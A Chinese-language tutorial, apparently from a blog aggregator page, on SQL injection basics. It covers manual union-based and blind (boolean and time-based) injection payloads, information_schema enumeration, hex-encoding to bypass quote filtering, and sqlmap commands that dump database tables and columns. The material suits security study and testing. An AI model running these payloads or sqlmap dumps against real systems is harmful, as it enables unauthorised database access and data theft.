当前位置: 首页 > news >正文

SQL注入基础

普通sql注入:后台能提供有价值的错误信息,显示在页面
    手动注入
        1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
        2. 确认注入点类型(查询语句是否带'')
            数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
            字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
        3. 猜当前页面查询的字段总数
            order by n     逐渐加大n,直到报错
        4. 查询页面显示了哪几个字段
            url后加 and 1=2 union select 1,2,3,4,5...n
            页面中会显示相应字段出现的位置
        5. 查询当前数据库名称
            url后加 and 1=2 union select 1,2,database(),4,5...n
            3号位置显示数据库名称
        6. 查询数据库中了所有表名(mysql)
            url后加 and 1=2 union select 1,2,group_concat(table_name),4,5...n from information_schema.tables where table_schema = database()
            information_schema: mysql数据库在系统中自动创建的一个库,统计了系统中所有数据库及其数据表
        7. 查询指定表中所有字段名称
            url后加 and 1=2 union select 1,2,group_concat(column_name),4,5...n from information_schema.columns where table_name = '查询的表名'
        8. 查询指定字段的值
            url后加 and 1=2 union select 1,2,字段名,字段名,4,5...n from '表名' limit 1,1
            limit N,M : 从第 N (从0开始)条记录开始, 返回 M 条记录。

    绕过防御
        转义字符:后台可能会过滤或转义引号。把引号里的字符进行16进制的HEX转码,就无需再使用引号
        post方式:使用burpsuit抓包


    php防注入
        PDO:php data objects
盲注
    通过仅有的判断信息对表中字段进行探测
    数据库不一定是mysql,没有information_schema库
    类型
        布尔型盲注:页面可以反馈判断的对错
        延时型盲注:页面无反馈,使用sleep函数观察页面是否有延时    
    1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
    2. 确定注入点类型
        数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
        字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
    3. 猜数据库名的长度
        and length(database())=n  n逐渐增大
    4. 猜数据库名的单个字符
        ' and ascii(substr(database(),1,1))>97
        ' and ascii(substr(database(),1,1))<122
        通过ascii码值逐渐调整找到该字符
        注意:此substr是mysql函数,起始位置从1开始;在php中是从0开始
    5. 逐个猜出数据库名
    6. 猜该数据库有多少张表
        ' and (select count(table_name) from information_schema.tables where table_schema=database())=n
        逐渐增大n,找到表的数量
    7. 猜第一张表名的长度
        ' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1
        逐渐增大n,找到第一个表名的长度
    8. 猜第一张表,第一个字符
    9. 猜出完整表名
    10. 猜第n张表名
    11. 猜目标表的总字段数
    12. 猜字段名
    13. 猜字段值

注入工具(原理与手动注入一致)
    sqlmap注入
        get注入
            sqlmap -u 'url' --dbs    获取数据库名
            sqlmap -u 'url' -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -u 'url' -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -u 'url' -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
        post注入(burpsuit开代理截取post包)
            sqlmap -r post包文件路径 --dbs  获取数据库名
            sqlmap -r post包文件路径 -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
    啊D
    明小子旁注
    metasploit

相关文章:

  • Kotlin全栈工程师转型路径
  • 矩阵方程$Ax=b$的初步理解.
  • 开发者工具箱-鸿蒙大小写转换开发笔记
  • PHP后端
  • Linux目录介绍+Redis部署(小白篇)
  • VLLM推理可以分配不同显存限制给两张卡吗?
  • AI+RWA探索 AI无限可能与区块链RWA结合才具有爆长的空间 —ATRNX.AI全智能量化决策Agent
  • 从法律视角看债务管理:湖北理元理律师事务所的实践探索
  • Android 16系统源码_自由窗口(一)触发自由窗口模式
  • ​​Java UDP套接字编程:高效实时通信的实战应用与核心类解析​
  • 《关于浔川社团退出DevPress社区及内容撤回的声明》
  • SQL每日一练(3)
  • QML元素 - LevelAdjust
  • Beetle 树莓派RP2350 - 随身气压计
  • Spring Boot中如何对密码等敏感信息进行脱敏处理
  • PCB设计教程【入门篇】——PCB设计基础-PCB构成与组成
  • 国际前沿知识系列五:时间序列建模方法在头部撞击运动学测量数据降噪中的应用
  • linux 内存碎片分析
  • 2025年电工杯数学建模B题【垃圾运输】原创论文分享
  • python第三方库安装错位
  • 销售公司运营方案/seo网站优化知识
  • 爱心捐赠网站怎么做/营销软件代理推广
  • excel做网站链接/国家高新技术企业查询
  • 广州市品牌网站建设企业/汽车品牌推广策划方案
  • 网站加速cdn/爱站网备案查询
  • 怎么做钓qq密码网站/发稿软文公司